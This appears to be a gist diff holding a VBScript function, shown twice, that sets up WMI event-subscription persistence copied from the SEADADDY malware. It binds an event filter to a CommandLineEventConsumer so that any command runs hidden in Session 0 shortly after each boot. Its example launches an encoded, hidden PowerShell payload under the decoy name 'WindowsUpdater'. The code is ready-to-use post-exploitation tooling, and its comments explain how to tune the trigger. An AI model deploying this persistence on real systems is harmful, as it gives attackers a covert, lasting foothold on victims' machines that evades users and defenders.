shelld0n · January 14, 2019 15:27
diff --git a/WMIPersistence.vbs b/WMIPersistence.vbs
 '
 ' SYNOPSIS:
 ' 	WMI Persistence method as originally presented by SEADADDY malware
 '		(https://github.com/pan-unit42/iocs/blob/master/seaduke/decompiled.py#L887)
 ' 	and further documented by Matt Graeber.
 '
 ' 	The scheduled command will be launched after roughly 3 minutes since system 
 ' 	gets up. Also, even if the command shall spawn a window - it will not be visible,
 ' 	since the command will get invoked by WmiPrvSE.exe that's running in Session 0.
 '
 ' USAGE:
 '	WMIPersistence("command to be launched", "taskName")
 '
 ' EXAMPLE:
 '	WMIPersistence("powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQ[...]EUAWAA=", "WindowsUpdater")
 '
 ' AUTHOR: 
 '	Mariusz B. / mgeeky, '17
 '

 Public Function WMIPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean
    Dim filterName, consumerName As String
    Dim objLocator, objService1
    Dim objInstances1, objInstances2, objInstances3
    Dim newObj1, newObj2, newObj3
    
    On Error GoTo Failed
    
    filterName = taskName & "Event"
    consumerName = taskName & "Consumer"
    
    Set objLocator = CreateObject("WbemScripting.SWbemLocator")
    Set objService1 = objLocator.ConnectServer(".", "root\subscription")
    
    '
    ' Step 1: Set WMI Instance of type Event Filter
    '
    Set objInstances1 = objService1.Get("__EventFilter")

    ' The malware originally will kicks in after roughly 3 minutes since System gets up.
    ' One can modify this delay time by modifying the WHERE clausule of the below query.
    query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 " _
    & "WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' " _
    & "AND TargetInstance.SystemUpTime >= 200 AND " _
    & "TargetInstance.SystemUpTime < 320"
    
    ' New object of type __EventFilter
    Set newObj1 = objInstances1.Spawninstance_
    newObj1.name = filterName
    newObj1.eventNamespace = "root\cimv2"
    newObj1.QueryLanguage = "WQL"
    newObj1.query = query
    newObj1.Put_
    
    '
    ' Step 2: Set WMI instance of type: CommandLineEventConsumer
    '
    Set objInstances2 = objService1.Get("CommandLineEventConsumer")
    Set newObj2 = objInstances2.Spawninstance_
    newObj2.name = consumerName
    newObj2.CommandLineTemplate = exePath
    newObj2.Put_
    
    '
    ' Step 3: Set WMI instance of type: Filter To Consumer Binding
    '
    Set objInstances3 = objService1.Get("__FilterToConsumerBinding")
    Set newObj3 = objInstances3.Spawninstance_
    newObj3.Filter = "__EventFilter.Name=""" & filterName & """"
    newObj3.Consumer = "CommandLineEventConsumer.Name=""" & consumerName & """"
    newObj3.Put_
    
    WMIPersistence = True
    Exit Function
 Failed:
    WMIPersistence = False
 End Function
	'
	' SYNOPSIS:
	' WMI Persistence method as originally presented by SEADADDY malware
	' (https://github.com/pan-unit42/iocs/blob/master/seaduke/decompiled.py#L887)
	' and further documented by Matt Graeber.
	'
	' The scheduled command will be launched after roughly 3 minutes since system
	' gets up. Also, even if the command shall spawn a window - it will not be visible,
	' since the command will get invoked by WmiPrvSE.exe that's running in Session 0.
	'
	' USAGE:
	' WMIPersistence("command to be launched", "taskName")
	'
	' EXAMPLE:
	' WMIPersistence("powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQ[...]EUAWAA=", "WindowsUpdater")
	'
	' AUTHOR:
	' Mariusz B. / mgeeky, '17
	'

	Public Function WMIPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean
	Dim filterName, consumerName As String
	Dim objLocator, objService1
	Dim objInstances1, objInstances2, objInstances3
	Dim newObj1, newObj2, newObj3

	On Error GoTo Failed

	filterName = taskName & "Event"
	consumerName = taskName & "Consumer"

	Set objLocator = CreateObject("WbemScripting.SWbemLocator")
	Set objService1 = objLocator.ConnectServer(".", "root\subscription")

	'
	' Step 1: Set WMI Instance of type Event Filter
	'
	Set objInstances1 = objService1.Get("__EventFilter")

	' The malware originally will kicks in after roughly 3 minutes since System gets up.
	' One can modify this delay time by modifying the WHERE clausule of the below query.
	query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 " _
	& "WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' " _
	& "AND TargetInstance.SystemUpTime >= 200 AND " _
	& "TargetInstance.SystemUpTime < 320"

	' New object of type __EventFilter
	Set newObj1 = objInstances1.Spawninstance_
	newObj1.name = filterName
	newObj1.eventNamespace = "root\cimv2"
	newObj1.QueryLanguage = "WQL"
	newObj1.query = query
	newObj1.Put_

	'
	' Step 2: Set WMI instance of type: CommandLineEventConsumer
	'
	Set objInstances2 = objService1.Get("CommandLineEventConsumer")
	Set newObj2 = objInstances2.Spawninstance_
	newObj2.name = consumerName
	newObj2.CommandLineTemplate = exePath
	newObj2.Put_

	'
	' Step 3: Set WMI instance of type: Filter To Consumer Binding
	'
	Set objInstances3 = objService1.Get("__FilterToConsumerBinding")
	Set newObj3 = objInstances3.Spawninstance_
	newObj3.Filter = "__EventFilter.Name=""" & filterName & """"
	newObj3.Consumer = "CommandLineEventConsumer.Name=""" & consumerName & """"
	newObj3.Put_

	WMIPersistence = True
	Exit Function
	Failed:
	WMIPersistence = False
	End Function